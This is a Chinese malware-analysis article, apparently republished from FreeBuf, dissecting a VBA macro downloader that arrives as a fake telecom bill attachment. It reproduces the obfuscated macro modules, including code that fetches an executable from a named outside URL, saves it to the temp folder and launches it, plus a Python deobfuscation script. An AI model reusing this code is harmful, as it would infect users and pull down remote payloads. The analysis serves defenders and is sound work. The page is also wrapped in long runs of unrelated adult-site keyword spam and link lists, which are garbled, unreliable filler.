精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

技術分析:一款流行的VBA宏病毒

安全
該宏代碼通過郵件進行傳播,當用戶使用word打開郵件中的附件,啟用宏代碼的時候,惡意代碼將會首先到http://laboaudio.com/4tf33w/下載w4t453.exe到受害者的臨時目錄,保存的名字為fghgkbb.exe,然后啟動該惡意程序。這個時候用戶就中病毒了。

1.通過郵件傳播的宏病毒

近期流行的一個宏病毒通過郵件進行傳播,捕捉到的一個樣本,其郵件頭如下:

技術分析:一款流行的VBA宏病毒

郵件的內容是這樣子的(為節省篇幅,省略號處省略部分內容):

Your bill summary
Account number: 24583
Invoice Number: 2398485
Bill date: July 201***mount: £17.50
How can I view my bills?
Your Chess bill is ready and waiting for you online. To check out your deta=led bill, previous bills and any charges you've incurred since your last b=ll, just sign into My Account www.chesstelecom.com/myaccount Forgotten your sign in details? 

If you've forgotten your sign in details, no problem, you can reset these b= choosing http://www.chesstelecom.com/lost_password.

Making payments is easy! 

If you want to make a credit or debit card payment you can do online by cho=sing http://www.chesstelecom.com/online_payment
You don't need to do anything if you pay by direct debit, we will collect y=ur payment automatically on or after 30th June. If you pay by cheque, deta=ls of how to pay us are available on the invoice.
Switch to Direct Debit today and you'll save at least £60.00 a year, s=mply call our dedicated team on 0844 770 6060.
Anything else you'd like to know? 

......

This e-mail has been sent from a Mailbox belonging to Chess Telecom, registered office Bridgford House, Heyes Lane, Alderley Edge, Cheshire, SK9=7JP. 
Registered in England, number 2797895. Its contents are confidential to the=20 intended recipient.
If you receive in error, please notify Chess Telecom on 
+44 (0)800 019 8900 immediately quoting the name of the sender, the 
+email
address to which it has been sent and then delete it; you may not rely on i=s contents nor copy/disclose it to anyone.
Opinions, conclusions and statements
of intent in this email are those of the sender and will not bind Chess Tel=com unless confirmed by an authorised representative independently of this mess=ge. 
We do not accept responsibility for viruses; you must scan for these.
Please
note that emails sent to and from Chess Telecom are routinely monitored for=20 record keeping, quality control and training purposes, to ensure regulatory=20 compliance and to prevent viruses and unauthorised use of our computer systems.
Thank you for your co-operation.

Quotations are subject to terms and conditions, exclude VAT and are subject to site survey.

E&OE

上述郵件正文:描述內容看起來相當的可靠,里面的電話號碼都是真實的,并且給出了具體的公司名稱地址,而且這個公司還真是具體存在的,現在還不知道這個公司是否知道自己被人冒名干壞事兒了(有點繞口,但不是重點…),之所以這么逼真,只是惡意郵件發送者希望以此來降低受害者的防備意識。

2.提取宏代碼

我們主要分析的郵件的附件,通過Outlook的保存功能可以將郵件中的附件2015-07-Bill.docm保存出來,我們分析需要用到一個工具OfficeMalScanner,可以到這里下載。

提取宏代碼的步驟如下:

2.1 解壓

OfficeMalScanner.exe 2015-07-Bill.docm inflate

解壓后將會默認保存到C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DecompressedMsOfficeDocument目錄下面(WinXP SP3環境),解壓后的目錄大致如下:

│  [Content_Types].xml
│
├─docProps
│      app.xml
│      core.xml
│
├─word
│  │  document.xml
│  │  fontTable.xml
│  │  settings.xml
│  │  styles.xml
│  │  vbaData.xml
│  │  vbaProject.bin
│  │  webSettings.xml
│  │
│  ├─theme
│  │      theme1.xml
│  │
│  └─_rels
│          document.xml.rels
│          vbaProject.bin.rels
│
└─_rels

上面的文檔目錄結構中可以發現在word目錄下含有一個vbaProject.bin的文件,這就是宏文件代碼所在的地方,需要注意的是vbaProject名字是可以任意取的,并不一定就是vbaProject(為默認的宏文件名字)。接下來從vbaProject.bin文件中提取宏代碼。

2.2 提取

OfficeMalScanner.exe vbaProject.bin info

默認會在vbaProject.bin同目錄下生成一個文件夾VBAPROJECT.BIN-Macros,里面存放有vba宏代碼的各個模塊。本案例中所提取到的各個文件如下:

Module1
Module2
Module35
Module4
ThisDocument

上面的文件都是vb代碼,只不過去掉了后綴而已。接著的工作就是分析vb代碼,看一下具體做了什么。#p#

3.代碼分析

為了便于說明,并沒有按照模塊的順序來說明。

3.1 Module2代碼分析

Module2的代碼如下:

1  Attribute VB_Name = "Module2"
2  
3  Function init()
4  
5    Set thisfrm = Forms("main")
6  
7    frmWidth = thisfrm.InsideWidth
8    frmHeight = thisfrm.InsideHeight
9  
10  End Function
11  Public Function lLJrFk6pKsSYJ(L9QLFPTuZDwM As String)
12  L9QLFPTuZDwM = Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), "")
13   Set lLJrFk6pKsSYJ = CreateObject(L9QLFPTuZDwM)
14  End Function
15  Private Sub button_physical_inventory_Click()
16  On Error GoTo Err_button_physical_inventory_Click
17  
18      strSQLWhere = Me.combo_department_name.Value
19      stDocName = "physical_inventory"
20      DoCmd.OpenReport stDocName, acPreview
21  
22  Exit_button_physical_inventory_Click:
23      Exit Sub
24  
25  Err_button_physical_inventory_Click:
26      MsgBox Err.Description
27      Resume Exit_button_physical_inventory_Click
28      
29  End Sub

主要看[11-14]行代碼,如下:

Public Function lLJrFk6pKsSYJ(L9QLFPTuZDwM As String)
L9QLFPTuZDwM = Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), "")
 Set lLJrFk6pKsSYJ = CreateObject(L9QLFPTuZDwM)
End Function

函數中的主要語句Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), ""),其中的Chr(60),chr(61),Chr(59)分別對應于<,=,;,這些就是被替換的字符,替換的字符是""(NULL,也就是刪除了原有字符)。

因此本模塊的主要功能,是提供一個解密函數lLJrFk6pKsSYJ(string),將string中的"<,=,;"刪除得到真正的字符串。

3.2 模塊Module1模塊分析

Module1的代碼如下:

1 Attribute VB_Name = "Module1"
2 
3 Private Sub Form_Load()
4   Me.RecordSource = strSQLInventory
5   
6   If Me.boxes > 0 Or Me.pieces > 0 Then
7     Me.total = (strInventoryCount * Me.boxes) + Me.pieces
8   Else
9     Me.total = Me.pieces
10   End If
11 
12 End Sub
13 
14 Private Sub boxes_LostFocus()
15   If Me.boxes > 0 Then
16     Me.total = strInventoryCount * Me.boxes
17   End If
18 End Sub
19 
20 Public Function FlvXHsDrWT3aY(yXhBaz0XR As Variant, c7e410X3Qq As String)
21 Dim NLobhieCn4Xt: Set NLobhieCn4Xt = lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
22 
23 With NLobhieCn4Xt
24    .Type = 1
25     .Open
26     .write yXhBaz0XR
27 End With
28     NLobhieCn4Xt.savetofile c7e410X3Qq, 2
29 End Function
30 Private Sub pieces_LostFocus()
31   If Me.boxes > 0 Or Me.pieces > 0 Then
32     Me.total = (strInventoryCount * Me.boxes) + Me.pieces
33   Else
34     Me.total = Me.pieces
35   End If
36 End Sub
37 
38 Private Sub btn_save_Click()
39   DoCmd.Save
40 End Sub

主要看[20-29]代碼段,如下:

Public Function FlvXHsDrWT3aY(yXhBaz0XR As Variant, c7e410X3Qq As String)
Dim NLobhieCn4Xt: Set NLobhieCn4Xt = lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")

With NLobhieCn4Xt
   .Type = 1
    .Open
    .write yXhBaz0XR
End With
    NLobhieCn4Xt.savetofile c7e410X3Qq, 2
End Function

主要提供一個函數FlvXHsDrWT3aY(yXhBaz0XR=字節數組,c7e410X3Qq=文件名),其語句為:

lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")

可以看到這里采用了Module2中的解密函數lLJrFk6pKsSYJ,對加密的字符串進行解密后使用。我們已經知道了lLJrFk6pKsSYJ函數的作用,因此手工解密后得到:

<do;db=.St=r< e a; m

刪除其中的"空格 ; < =",得到真正的命令:Adodb.Stream。進一步分析可以得到該函數的作用為:

采用adodb.stream流,將字節數組寫入指定文件中。

稍后我將會提供一個Python腳本對這些命令進行解密,還原出宏代碼的真正命令。#p#

3.3 Module4模塊分析

1  Attribute VB_Name = "Module4"
2  
3  Public ctlWidth As Integer
4  Public ctlHeight As Integer
5  Public aDPbd2byZb As String
6  Public strSQLBase As String 'query base
7  Public objSearchForm As String 'require form name
8  Public objInputCode As String 'text field for product code entry
9  Public objInputName As String 'text field for product name entry
10  Public searchCode As String
11  Public searchName As String
12  Public colS1 As String 'column to search
13  Public colS2 As String 'column to search
14  
15  Function search_records()
16  
17      'check form controls if they have user input
18      If Not IsNull(Forms(objSearchForm).Controls(objInputCode)) Then
19          searchCode = Forms(objSearchForm).Controls(objInputCode)
20      Else
21          searchCode = ""
22      End If
23      
24      If Not IsNull(Forms(objSearchForm).Controls(objInputName)) Then
25          searchName = Forms(objSearchForm).Controls(objInputName)
26      Else
27          searchName = ""
28      End If
29      
30      'main search logic
31      If (searchCode = "" And searchName = "") Or (IsNull(searchCode) And IsNull(searchName)) Then
32          strSQLSearch = strSQLBase
33      ElseIf (Not IsNull(searchCode) = True) And (Not IsNull(searchName) = True) Then
34          strSQLSearch = strSQLBase & " WHERE " & colS1 & " LIKE '" & searchCode & "*' AND " & colS2 & " LIKE '*" & searchName & "*'"
35      ElseIf Not IsNull(searchCode) Then
36          strSQLSearch = strSQLBase & " WHERE " & colS1 & " LIKE '" & searchCode & "*'"
37      ElseIf Not IsNull(searchName) Then
38          strSQLSearch = strSQLBase & " WHERE " & colS2 & " LIKE '*" & searchName & "*'"
39      Else
40          MsgBox "Please provide details to search"
41          Exit Function
42      End If
43  
44      Forms(objSearchForm).RecordSource = strSQLSearch
45  
46  End Function
47  Function control_set_left(controlName As String)
48      
49    thisfrm.Controls(controlName).Left = 720
50    
51  End Function
52  
53  Sub LWS8UPvw1QGKq()
54  
'下載地址:Nrh1INh1S5hGed="http://laboaudio.com/4tf33w/w4t453.exe".
55  Nrh1INh1S5hGed = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & "a" & Chr(60) & Chr(117) & "d" & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & "e" & Chr(61) & Chr(120) & Chr(101)
'下載方式:LhZitls7wPn=Microsoft.XMLHTTP
56  Set LhZitls7wPn = lLJrFk6pKsSYJ("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
57  
58  Nrh1INh1S5hGed = Replace(Replace(Replace(Nrh1INh1S5hGed, Chr(60), ""), Chr(61), ""), Chr(59), "")
'使用CallByName進行下載:CallByName Microsoft.XMLHTTP Open http://laboaudio.com/4tf33w/w4t453.exe
59  CallByName LhZitls7wPn, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
60  Nrh1INh1S5hGed _
61  , False
62  
'vu2Wh85645xcP0=WScript.Shell
63  Set vu2Wh85645xcP0 = lLJrFk6pKsSYJ(Chr(87) & "<" & Chr(83) & "c" & Chr(61) & Chr(114) & "i" & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & "l" & Chr(108))
64  
'獲取查詢環境變量的句柄: GhbwRqU9OkbF=CallByName(WScript,Environmentrocess)
65  Set GhbwRqU9OkbF = CallByName(vu2Wh85645xcP0, Chr(69) & Chr(110) & "v" & Chr(105) & Chr(114) & Chr(111) & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & "o" & Chr(99) & "e" & Chr(115) & "s")
66  
'取得臨時目錄的路徑:GhbwRqU9OkbF(TEMP)
67  SD3q5HdXxoiA = GhbwRqU9OkbF(Chr(84) & Chr(69) & Chr(77) & Chr(80))
68  
'下載的惡意程序存放路徑:aDPbd2byZb=%TEMP%\fghgkbb.exe
69  aDPbd2byZb = SD3q5HdXxoiA & "\" & Chr(102) & Chr(103) & Chr(104) & Chr(103) & Chr(107) & Chr(98) & Chr(98) & Chr(46) & "e" & "x" & Chr(101)
70  Dim bvGEpxCVsZ() As Byte
71 
'發送請求:CallByName Microsoft.XMLHTTP send VbMethod
72  CallByName LhZitls7wPn, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
'獲取響應體:CallByName Microsoft.XMLHTTP responseBody VbGet
73  bvGEpxCVsZ = CallByName(LhZitls7wPn, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & Chr(100) & "y", VbGet)
'使用adodb.stream流,將bvGEpxCVsZ字節流寫入到文件aDPbd2byZb中
'將字節數組bvGEpxCVsZ寫入文件aDPbd2byZb'
'這里涉及到了模塊Module1中的函數FlvXHsDrWT3aY(字節數組,文件名)
74  FlvXHsDrWT3aY bvGEpxCVsZ, aDPbd2byZb
75  On Error GoTo OhXhZLRKh
76      a = 84 / 0
77    On Error GoTo 0
78    
79  xrIvr6mOXvFG:
80    Exit Sub
81  OhXhZLRKh:
82    ENMD3t8EY4A ("UfBPGay4VPJi")
83  Resume xrIvr6mOXvFG
84  End Sub
85  Function control_set_right(controlName As String)
86      
87    ctlWidth = thisfrm.Controls(controlName).Width
88    thisfrm.Controls(controlName).Left = frmWidth - ctlWidth - 720
89    
90  End Function
91  
92  Function control_set_center(controlName As String)
93    
94    ctlWidth = thisfrm.Controls(controlName).Width
95    thisfrm.Controls(controlName).Left = (frmWidth / 2) - (ctlWidth / 2)
96  
97  
98  End Function

 

主要看[53-90]行,分析函數LWS8UPvw1QGKq的作用,為了了解這個函數到底干了什么,我們需要對其解密,上面的兩個模塊由于函數較短,可以進行手工解密,然而由于這個模塊中要解密的太多,

手工解密顯然是一種繁瑣效率低下的方式,故給出如下Python代碼(Python3):

import sys
import io
import re
sys.stdout=io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
def decryptstr(s):
    cmd=''
    cmdlst=s.strip().split('&')
    pat=re.compile(r"Chr\([0-9]*\)")
    for item in cmdlst:
        if 'Chr' in item:
            beg,end=item.find('('),item.find(')')
            numstr=item[beg+1:end]
            cmd+=chr(int(numstr))
        else:
            cmd+=item.replace('"','')
    cmd=cmd.replace(' ','')
    cmd=cmd.replace('=','')
    cmd=cmd.replace(';','')
    cmd=cmd.replace('<','')
    print(cmd)

ss=input("Input String:")
while len(ss)!=0:
    print(decryptstr(ss))
    ss=input("Input String:")

代碼比較少也比較簡單,就沒有寫注釋了。用法看下圖就可以了:

技術分析:一款流行的VBA宏病毒;

Input String:后面粘貼上要解密的字符串,然后回車就可以得到解密后的字符串。

代碼中也加入了注釋,理解這塊代碼應該不難。可以知道該模塊從http://laboaudio.com/4tf33w/w4t453.exe下載得到惡意程序w4t453.exe,以fghgkbb.exe文件名保存到臨時目錄。

3.4 ThisDocument模塊分析

該模塊主要代碼如下(不像上面都給出了完整代碼,而是僅僅給出了核心代碼,如果希望查看完整代碼的,可以到文末下載附件):

Public Function ENMD3t8EY4A(Ka0YAlL82q As String)
'Shell.Application:創建了一個shell對象
 Set CYgAH0pzCPj0eA = lLJrFk6pKsSYJ(Chr(83) & Chr(104) & "=" & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & "i" & Chr(60) & "c" & "a" & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
With CYgAH0pzCPj0eA
'open(C:\DOCUME~1\USERNAME\LOCALS~1\Temp\fghgkbb.exe):啟動惡意程序
.Open (aDPbd2byZb)  
End With
End Function

也就是啟動下載的惡意程序。

另外,還有一個Module35模塊,我沒有進行說明,因為Module35基本上沒有提供有用的信息,可以忽略,并不影響我們分析該宏的功能。

4.結論

至此,我們可以知道,該宏代碼通過郵件進行傳播,當用戶使用word打開郵件中的附件,啟用宏代碼的時候,惡意代碼將會首先到http://laboaudio.com/4tf33w/下載w4t453.exe到受害者的臨時目錄,保存的名字為fghgkbb.exe,然后啟動該惡意程序。這個時候用戶就中病毒了。

文末,還是提醒一下大家,對于陌生郵件,一定要慎重的打開,很多人對于郵件,什么都沒有想,就直接打開郵件了。在本案例中是通過附件word中的宏代碼進行感染,但是有的惡意程序直接在你打開郵件的時候就感染上病毒了。

另外由于Office安全機制的提升,在Word2007版本以上,打開一個有宏文件的文檔時,會提示是否啟用,這個時候不要隨意選擇啟用(可能這看起來是廢話,但是很多人下意識就去點擊了啟用)。

如果你希望自己親自分析一下,你可以到這里下載本案例中的郵件。解壓密碼為:freebuf

希望本文對信息安全行業的人員有所幫助。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2012-10-08 11:55:05

2020-05-10 17:06:10

勒索病毒攻擊加密

2011-03-23 13:15:29

Access宏病毒

2011-09-05 15:20:59

2021-07-11 17:07:00

勒索病毒Hive黑客

2015-10-05 17:38:33

2025-04-07 08:10:00

2011-01-04 09:20:00

2016-03-29 14:54:36

2015-03-10 10:39:55

2022-03-04 09:05:55

StarRocks數據湖數據質量

2021-06-09 09:52:29

開源Pyroscope代碼

2021-11-01 05:53:08

Doldrums逆向工程分析工具安全工具

2020-05-21 09:56:54

語音技術新冠病毒人工智能

2024-09-19 15:22:24

2020-11-17 09:27:26

KubernetesYAMLKubeLinter

2024-01-25 10:40:11

AutoProfil開源分析工具

2015-12-17 16:18:21

2022-06-28 22:13:33

Polars數據處理與分析

2025-04-25 05:00:00

StarRocks開源數據倉庫
點贊
收藏

51CTO技術棧公眾號

欧美国产精品日韩| 91精品国产一区二区三区蜜臀 | 欧美成aaa人片免费看| 亚洲国产精品第一页| 性感女国产在线| 欧美国产激情二区三区| 51国产成人精品午夜福中文下载| 亚洲欧美在线观看视频| 欧美理论在线播放| 精品国产乱码久久久久久图片 | 免费的av在线| 暖暖视频在线免费观看| 国内成+人亚洲+欧美+综合在线| 久久久久国色av免费观看性色 | 欧美特级特黄aaaaaa在线看| 日韩中文字幕麻豆| 韩国福利视频一区| 三级黄色录像视频| 综合伊思人在钱三区| 日韩精品专区在线影院重磅| 免费涩涩18网站入口| 123区在线| 亚洲品质自拍视频| 日韩三级在线播放| 偷拍自拍在线| 国产福利一区二区三区视频在线| 国产精品入口免费视频一| 日产精品久久久久久久| 91精品一区二区三区综合| 亚洲午夜av久久乱码| 国产一级伦理片| 午夜电影一区| 日韩一区二区精品在线观看| 艹b视频在线观看| 网友自拍亚洲| 欧美色另类天堂2015| 久久久久久久久久伊人| 日本在线视频观看| 国产日韩欧美在线一区| 久久久久se| 天天干天天爱天天操| 国产一区二区三区久久悠悠色av| 国产精品一区二区久久久久| 91porny九色| 西西人体一区二区| 7m精品福利视频导航| www.av视频在线观看| 国内精品久久久久久久97牛牛| 久久精品成人欧美大片古装| 久久久国产一级片| 日韩av二区| 色青青草原桃花久久综合| 亚洲黄色免费视频| 精品国产精品| 在线亚洲男人天堂| 999精品久久久| 国产韩国精品一区二区三区| 日韩视频永久免费观看| 成年人二级毛片| 欧美 日韩 国产 一区| 欧美激情精品久久久久| 国产无遮挡aaa片爽爽| 夜夜爽av福利精品导航| 欧美一级免费看| 免费黄色网址在线| 日韩中文字幕区一区有砖一区| 国产激情999| 国产精品久久久国产盗摄| 国内精品伊人久久久久av影院| 亚洲va男人天堂| 亚洲精品国产片| 91在线观看污| 色噜噜狠狠色综合网| 一区二区高清不卡| 一区二区三区丝袜| 黄页免费在线观看视频| 成人福利av| 欧美日本免费一区二区三区| 日本一二三区在线| 日韩欧美美女在线观看| 国产一区二区三区视频| av黄色免费在线观看| 欧美日本不卡高清| 欧美有码在线视频| 亚洲一区 中文字幕| 国产精品小仙女| 精品日本一区二区三区| 不卡在线视频| 亚洲一区二区影院| av片中文字幕| 激情不卡一区二区三区视频在线| 亚洲国产精品久久| 日本视频在线免费| 亚洲精品1区| 国产精品丝袜视频| 黄色av免费观看| 欧美国产欧美亚州国产日韩mv天天看完整| 一区二区不卡在线视频 午夜欧美不卡'| 超鹏97在线| 色婷婷久久久综合中文字幕| 日韩欧美中文视频| 国产精品欧美三级在线观看| 九九九久久久久久| 中文字幕在线天堂| 丁香六月综合激情| 一区二区精品在线观看| 69av成人| 日韩视频免费观看高清在线视频| 中国美女乱淫免费看视频| 欧美福利一区| 国产精品一区二区女厕厕| 无码国精品一区二区免费蜜桃| 中文字幕日韩一区| 成年人黄色片视频| 成人午夜三级| 欧美成aaa人片在线观看蜜臀| 色av性av丰满av| 成人av在线观| 9191国产视频| 亚洲欧美国产一本综合首页| 欧美一区二区影院| 91丨九色丨丰满| 久久免费精品国产久精品久久久久| 欧美与动交zoz0z| 欧美精品资源| 亚洲人成毛片在线播放| 国产成人无码精品久在线观看| 久久99精品久久久久婷婷| 美乳视频一区二区| 国产第一页在线| 日韩一区二区精品葵司在线| 亚洲色图100p| 免费黄网站欧美| 欧美一区二区三区在线免费观看| 波多野结衣在线高清| 欧美一二三区在线| 艳妇荡乳欲伦69影片| 蜜臀a∨国产成人精品| 欧美伦理一区二区| 瑟瑟视频在线看| 亚洲国产中文字幕在线观看| 久久久久成人网站| 国产精品乡下勾搭老头1| 老司机av福利| 成年永久一区二区三区免费视频 | 亚洲精品一区二区18漫画| 日韩一区电影| 成人激情综合网| 快射视频在线观看| 欧美高清一级片在线| 亚洲不卡的av| 国产一区福利在线| 奇米777四色影视在线看| 久久三级中文| 欧美国产高跟鞋裸体秀xxxhd| 国产成人精品亚洲精品色欲| 一区二区三区在线视频播放 | 免费在线不卡av| 国产精品久久久久一区| 成年网站在线播放| 99精品电影| 91在线短视频| 精品丝袜在线| 亚洲一区999| 中文字幕有码视频| 亚洲欧美乱综合| 亚洲日本久久久| 国产欧美另类| 日韩和欧美的一区二区| 国产极品嫩模在线观看91精品| 最近2019免费中文字幕视频三| 中文字幕制服诱惑| 一区二区三区国产精品| 少妇一级淫片免费放播放| 久久大逼视频| 一区二区三区偷拍| 福利片在线一区二区| 欧美专区在线视频| 香蕉视频国产在线观看| 欧美成人一区二区三区片免费| 圆产精品久久久久久久久久久| 久久久综合精品| 久久久久久久高清| 亚洲精选在线| 宅男噜噜99国产精品观看免费| 欧美成人精品午夜一区二区| 91国产一区在线| 麻豆视频在线观看免费| 精品少妇一区二区三区免费观看| 欧美一级特黄视频| 中文字幕色av一区二区三区| 久久人妻一区二区| 蜜桃视频免费观看一区| 免费看欧美一级片| 成人免费电影网址| 国产精品一区在线播放| 久久国内精品| 91av在线看| 国产黄大片在线观看画质优化| 日韩精品久久久久久久玫瑰园| 黄色网址中文字幕| 一级精品视频在线观看宜春院| 偷拍夫妻性生活| 成人精品视频.| 中文字幕在线综合| 亚洲激情国产| 影音先锋成人资源网站| 精品影片在线观看的网站| 亚洲a中文字幕| 巨胸喷奶水www久久久| 久久免费视频网| 麻豆视频网站在线观看| 亚洲欧美中文字幕| 蜜臀久久99精品久久久| 在线播放/欧美激情| 精品人妻一区二区三区潮喷在线 | 国产男女免费视频| 欧美1区视频| 亚洲欧洲国产日韩精品| 日韩欧美美女在线观看| 国产厕所精品在线观看| 国产精久久久| 国产精品男女猛烈高潮激情| 韩日毛片在线观看| 欧美激情手机在线视频 | 色综合色狠狠天天综合色| 欧美日韩一级在线观看| 国产精品国产三级国产| 在线观看国产精品一区| 91色porny| 黄色在线观看av| 99久久亚洲一区二区三区青草| 中文字幕欧美视频| 国产一区二区电影| 午夜免费看毛片| 美女网站一区二区| 日本黄大片一区二区三区| 天堂成人国产精品一区| 漂亮人妻被中出中文字幕| 日韩午夜av| 久久99中文字幕| 91久久午夜| 成人在线播放网址| 伊人成人在线| 欧美,日韩,国产在线| 亚洲激情欧美| www黄色日本| 羞羞视频在线观看欧美| 色综合av综合无码综合网站| 国产精品久久国产愉拍| 欧美 国产 日本| 亚洲在线成人| 日本精品久久久久中文字幕| 视频一区欧美日韩| 久久久精品麻豆| 韩国三级在线一区| 国产黑丝在线视频| 懂色av中文字幕一区二区三区 | 免费裸体美女网站| 日韩av网站免费在线| 久久黄色片网站| 国产乱子伦视频一区二区三区| 精品无码av一区二区三区不卡| 成人18视频日本| 国产精品高清无码在线观看| 国产情人综合久久777777| 三级黄色录像视频| 亚洲一区二区三区小说| 欧美一级片免费在线观看| 在线一区二区三区四区五区| 亚洲性在线观看| 日韩欧美在线123| 四虎国产精品永远| 国产一区二区三区在线观看视频| 3p视频在线观看| 久久久久久国产精品三级玉女聊斋| 密臀av在线播放| 国产99久久久欧美黑人| 97精品资源在线观看| 国产精品一区视频网站| 欧美亚洲高清| 日本男女交配视频| 母乳一区在线观看| 男人午夜视频在线观看| av日韩在线网站| 91免费在线看片| 午夜伦欧美伦电影理论片| 久久久久久无码午夜精品直播| 91精选在线观看| 色鬼7777久久| 久久精品国产精品| 中文字幕在线直播| 成人免费看黄网站| 欧美亚洲国产日韩| 亚洲一区二区不卡视频| 国产欧美精品| av影片在线播放| 国产精品久久久久天堂| 国产精品老女人| 欧美精品在线观看一区二区| 无码精品人妻一区二区三区影院| www.精品av.com| 亚洲插插视频| 99久久精品久久久久久ai换脸| 精品欧美久久| 国产免费毛卡片| 国产sm精品调教视频网站| 欧美成人短视频| 色视频一区二区| 亚洲欧美激情另类| 日韩中文在线观看| 网友自拍亚洲| 精品久久久久久中文字幕动漫| 在线精品视频在线观看高清| 激情五月婷婷久久| 99国产精品99久久久久久| 欧美日韩偷拍视频| 欧美剧情片在线观看| 精彩国产在线| 欧美一区二区三区免费视| 国产成人澳门| 成年丰满熟妇午夜免费视频 | 麻豆电影在线播放| 国产91免费看片| 天天躁日日躁狠狠躁欧美| 亚洲国产一二三精品无码| 精品在线播放午夜| 91激情视频在线观看| 日韩欧美亚洲成人| 婷婷伊人综合中文字幕| 欧美高清视频在线播放| 欧美精品三级在线| 97精品国产97久久久久久粉红| 蜜桃传媒麻豆第一区在线观看| 国产女主播喷水高潮网红在线| 欧美日韩视频免费播放| 天堂网在线播放| 18性欧美xxxⅹ性满足| 狼人精品一区二区三区在线| 国产美女永久无遮挡| 丁香六月综合激情| 日本少妇xxxx动漫| 亚洲国产精品yw在线观看 | 成人在线免费公开观看视频| 国产福利视频一区| 欧美一区电影| 五月婷婷之婷婷| 综合在线观看色| 精品国产av 无码一区二区三区| 精品国产欧美一区二区三区成人| 国产精品亚洲成在人线| 亚洲开发第一视频在线播放| 美腿丝袜一区二区三区| 91麻豆精品久久毛片一级| 欧美裸体bbwbbwbbw| 国产欧美黑人| 亚洲一区二区三区777| 欧美日韩视频| chinese麻豆新拍video| 色婷婷香蕉在线一区二区| 无遮挡的视频在线观看| 国产日产欧美a一级在线| 51精产品一区一区三区| 精产国品一区二区三区| 亚洲成av人片一区二区| 免费在线毛片| 91精品视频观看| 日韩视频三区| 亚洲第一综合网| 在线不卡一区二区| 日本aa在线| 日本免费高清一区| 激情综合五月婷婷| 日本黄色片视频| 色哟哟网站入口亚洲精品| 亚洲国产一区二区三区网站| 男女啪啪免费视频网站| 国产欧美日韩激情| 亚洲国产999| 国产成人jvid在线播放| 欧美大片aaaa| 免费看毛片的网站| 欧美三级中文字幕在线观看| 色呦呦呦在线观看| 日本不卡免费新一二三区| 国产一区欧美一区| 91美女免费看| 久久综合88中文色鬼| 欧美a大片欧美片| 亚洲激情在线看| 午夜成人免费电影| 色三级在线观看| 国模精品娜娜一二三区| 看片的网站亚洲| 青青草av在线播放| 日韩在线欧美在线| 天堂av一区二区三区在线播放| 天天影视色综合| 一本到不卡免费一区二区| 午夜小视频在线观看|